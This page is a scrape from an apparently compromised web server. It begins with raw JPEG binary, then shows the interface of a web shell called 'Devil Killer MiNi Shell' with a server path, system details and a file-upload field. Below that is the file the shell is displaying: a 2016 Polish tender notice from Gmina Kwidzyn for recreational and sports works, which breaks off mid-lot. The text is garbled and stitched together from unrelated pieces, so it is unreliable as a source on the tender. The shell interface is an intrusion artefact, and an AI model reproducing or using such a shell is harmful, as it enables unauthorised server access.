JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160721/149413-N-2016.html

<p class="kh_header"><b>Kwidzyn: ZAGOSPODAROWANIE PRZESTRZENI PUBLICZNEJ DLA CELÓW REKREACYJNO- SPORTOWYCH NA TERENIE GMINY KWIDZYN</b><br>
<b>Numer ogłoszenia: 149413 - 2016; data zamieszczenia: 21.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kwidzyn , ul. Grudziądzka 30, 82-500 Kwidzyn, woj. pomorskie, tel. 055 261-41-51, faks 055 2792306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminakwidzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE PRZESTRZENI PUBLICZNEJ DLA CELÓW REKREACYJNO- SPORTOWYCH NA TERENIE GMINY KWIDZYN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowaniu przestrzeni publicznej dla celów rekreacyjno-sportowych na terenie gminy Kwidzyn, w następujących częściach:
I 		Baldram,
II 		Brachlewo,
III 		Brokowo,
IV 		Bronno, 
V 		Dubiel,
VII 		Górki,
XI		Korzeniewo,
XII		Licze, 
XIV		Mareza,
XVI		Ośno,
XVII	        Pastwa,
XVIII	        Pawlice, 
XIX		Podzamcze,
XX		Rozpędziny,
XXI		Szałwinek,
XXII	Brachlewo, Brokowo, Janowo, Nowy Dwór, Pawlice, Szałwinek

Zamówienie składa się z szesnastu części.
Warunki ogólne realizacji zamówienia - części zamówienia. 
Zamawiający na realizację poszczególnych części zamówienia przeznaczy środki w kwocie nie większej niż wskazane poniżej: 

I 		Baldram    3 836,00 zł,
II 		Brachlewo   17 752,00 zł,
III 		Brokowo   12 470,00 zł,
IV 		Bronno   10 894,00 zł, 
V 		Dubiel   11 700,00 zł,
VII 		Górki   19 939,00 zł,
XI		Korzeniewo   16 354,00 zł,
XII		Licze   21 828,00 zł, 
XIV		Mareza   29 748,00 zł,
XVI		Ośno   16 065,00 zł,
XVII	        Pastwa   14 984,00 zł,
XVIII	        Pawlice   11 995,00 zł, 
XIX		Podzamcze   15 914,00 zł,
XX		Rozpędziny   15 764,00 zł,
XXI		Szałwinek   11 376,00 zł,
XXII	        Brachlewo, Brokowo, Janowo, Nowy Dwór, Pawlice, Szałwinek 70 000,00 zł.

Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji projektowej wraz ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych. 

Zamawiający zastrzega, aby zastosowane do budowy materiały posiadały ważne aprobaty techniczne, certyfikaty bezpieczeństwa i atesty higieniczne. 
Urządzenia placu zabaw i siłowni zewnętrznych muszą posiadać certyfikat poświadczający, że zostały one zaprojektowane i wykonane zgodnie z odpowiednimi normami bezpieczeństwa.
Przed przystąpieniem do realizacji robót Wykonawca przedstawi do zatwierdzania Inspektorowi nadzoru Wnioski Materiałowe dotyczące wszystkich materiałów i urządzeń planowanych do wbudowania. 

Zamawiający dopuszcza przy realizacji zamówienia zastosowanie urządzeń i materiałów równoważnych co do jakości i surowców użytych do ich wykonania do materiałów i urządzeń podanych w dokumentacji projektowej pod warunkiem ich zatwierdzenia przez Zamawiającego. 

Gdziekolwiek w opisie przedmiotu zamówienia (w tym również w projekcie budowlanym) występują odniesienia do Polskich Norm, dopuszczalne jest stosowanie odpowiednich norm krajów Unii Europejskiej, 
w zakresie przyjętym przez polskie prawodawstwo. 

Zamawiający załącza szczegółowe rozwiązanie projektowe dotyczące wykonania utwardzenia nawierzchni pn. Szczegół obrzeża utwardzenia obowiązujące dla wszystkich części zamówienia, w których zakresie jest budowa utwardzenia nawierzchni. 

Zamawiający załącza szczegółowe rozwiązanie projektowe dotyczące wykonania połączenia słupa ze stopą fundamentową pn. Szczegół połączenia słupa ze stopą fundamentową obowiązujące dla wszystkich części zamówienia, w których zakresie jest budowa altany..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.27.23-9, 45.23.32.00-1, 37.53.52.00-9, 45.42.20.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo, pisemne zobowiązanie podmiotu trzeciego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany, w niżej wymienionych przypadkach:
1.	Zmiany terminu realizacji, w przypadku: 
a)	wystąpienia okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
b)	działań osób trzecich uniemożliwiających wykonanie robót, które to działania nie są konsekwencją winy którejkolwiek ze stron;
c)	istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa;
d)	uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
e)	wystąpienia dodatkowych robót, niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego Wykonawcę;
f)	z powodu niekorzystnych warunków atmosferycznych, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami);
g)	zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
2.	Zmiany wynagrodzenia, w przypadku:
a)	zmiany technologii wykonania robót, na wniosek Wykonawcy lub Zamawiającego i pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego;
b)	odstąpienia na wniosek Zamawiającego od realizacji części przedmiotu umowy.
3.	Poza innymi przypadkami określonymi w umowie, zmiany do umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający ani Wykonawca nie przewidywali w chwili zawierania umowy, a które mają wpływ na prawidłowe wykonanie przewidzianych w umowie robót budowlanych.
4.	Zatrudnienie dodatkowego Podwykonawcy na etapie realizacji przedmiotu umowy, zmiana Podwykonawcy lub zmiana zakresu prac powierzonych podwykonawcom dopuszczalna jest wyłącznie po uzyskaniu uprzedniej pisemnej zgody Zamawiającego.
5.	Niezależnie od powyższego, Zamawiający i Wykonawca dopuszczają możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację bądź zwiększających użyteczność przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminakwidzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kwidzyn, ul. Grudziądzka 30, 82-500 Kwidzyn, pokój 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2016 godzina 11:00, miejsce: Urząd Gminy Kwidzyn, ul. Grudziądzka 30, 82-500 Kwidzyn, pokój 1 Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sołectwo Baldram.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane prze Sołectwo Baldram, na działce geodezyjnej nr 113/14, obręb Baldram, gmina Kwidzyn. Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	dostawę i montaż urządzenia siłowni zewnętrznej typu orbitrek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.27.23-9, 45.23.32.00-1, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sołectwo Brachlewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Brachlewo, na działkach geodezyjnych nr 41/1, 55, 136, obręb Brachlewo, gmina Kwidzyn. 
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 35  m2, 
b)	wykonanie ławostołów z materiału powierzonego przez Zamawiającego, czyli drewna w postaci bali nieokorownych,
c)	utwardzenie powierzchni pod altaną,
d)	budowę ogrodzenia boiska - piłkochwyt,
e)	dostawę i montaż dwóch tablic informacyjnych,
f)	dostawę i montaż stelaża ogniskowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.23.32.00-1, 45.11.27.20-8, 45.26.23.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sołectwo Brokowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Brokowo, na działkach geodezyjnych nr 73, obręb Brokowo Tychnowieckie 
i 146/14, obręb Kamionka, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 25  m2, 
b)	utwardzenie terenu pod altaną kostką brukową,
c)	dostawę i montaż tablicy informacyjnej.
Do ceny ofertowej nie należy wliczać kosztów wykonywania robót ziemnych związanych z budową altany. Roboty te zostaną wykonane przez Zamawiającego we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sołectwo Bronno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Bronno, na działce geodezyjnej nr 445/23, obręb Licze, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 25 m2, 
b)	wyposażenie altany w ławostoły,
c)	dostawę i montaż urządzenia placu zabaw - huśtawki podwójnej typu ważka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sołectwo Dubiel.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Dubiel, na działce geodezyjnej nr 117, obręb Dubiel, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej  altany rekreacyjnej o powierzchni zabudowy ok. 25  m2, 
b)	wyposażenie altany w ławostoły,
c)	budowę ogrodzenia boiska - piłkochwyt,
d)	dostawę i montaż stojaka na rowery.
Zakres zamówienia nie obejmuje następujących elementów: 
a)	montażu kosza na odpadki.

Do ceny ofertowej nie należy wliczać kosztów wykonywania robót ziemnych związanych z budową altany. Roboty te zostaną wykonane przez Zamawiającego we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.23.32.00-1, 45.11.27.20-8, 45.26.23.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sołectwo Górki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Górki, na działce geodezyjnej nr 61/1, obręb Górki, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej  altany rekreacyjnej o powierzchni zabudowy ok. 35  m2, 
b)	utwardzenie terenu pod altaną kostką brukową,
c)	wyposażenie altany w ławostoły,
d)	dostawę i montaż zestawu: huśtawka ze zjeżdżalnią.

Do ceny ofertowej nie należy wliczać kosztów wykonywania robót ziemnych związanych z budową altany. Roboty te zostaną wykonane przez Zamawiającego we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Sołectwo Korzeniewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Korzeniewo, na działce geodezyjnej nr 177/4, obręb Korzeniewo, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	dostawę i montaż podwójnego urządzenia siłowni zewnętrznej typu wioślarz i prasa nożna, 
b)	budowa utwardzenia terenu przed sceną z płytek chodnikowych - powierzchni ok. 54 m2 oraz żwirowego o powierzchni ok. 20 m2
c)	dostawę i montaż ławek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.32.00-1, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Sołectwo Licze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Licze, na działkach geodezyjnych nr 240/3 i 276/13, obręb Licze, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 35  m2, 
b)	wyposażenie altany w ławostoły,
c)	dostawę i montaż grilla prefabrykowanego,
d)	dostawę i montaż dwóch koszy na śmieci
e)	dostawę i montaż urządzenia placu zabaw - karuzeli
f)	wyrównanie i obsianie trawą terenu o powierzchni ok. 20 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Sołectwo Mareza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Mareza, na działce geodezyjnej nr 260, obręb Mareza, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 25 m2,
